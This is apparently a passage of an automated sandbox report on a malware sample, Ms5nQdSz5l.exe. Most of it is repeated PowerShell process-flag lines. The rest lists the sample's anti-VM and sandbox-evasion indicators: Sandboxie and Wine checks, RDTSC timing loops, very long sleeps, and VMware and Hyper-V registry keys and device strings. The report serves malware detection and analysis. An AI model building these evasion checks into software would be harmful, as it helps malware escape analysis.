          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Ms5nQdSz5l.exe PID: 3560, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000AD98E4 second address: 0000000000AD98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000AD9B5E second address: 0000000000AD9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4675
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3066
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4061
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2755
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4083
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2291
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe TID: 396Thread sleep time: -99418s >= -30000s
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe TID: 1688Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 612Thread sleep time: -19369081277395017s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6412Thread sleep count: 4061 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6580Thread sleep count: 53 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6400Thread sleep count: 2755 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep count: 4083 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 63 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep time: -24903104499507879s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep count: 2291 > 30
          Source: C:\Windows\explorer.exe TID: 5804Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeThread delayed: delay time: 99418
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
          Source: powershell.exe, 00000001.00000003.363071692.00000000053AB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmpBinary or memory string: Hyper-V
          Source: explorer.exe, 0000000B.00000000.329550509.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 0000000B.00000002.497448506.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000B.00000000.329940814.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ocal
          Source: explorer.exe, 0000000B.00000000.262710030.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000002.510154790.0000000003755000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}gesB
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
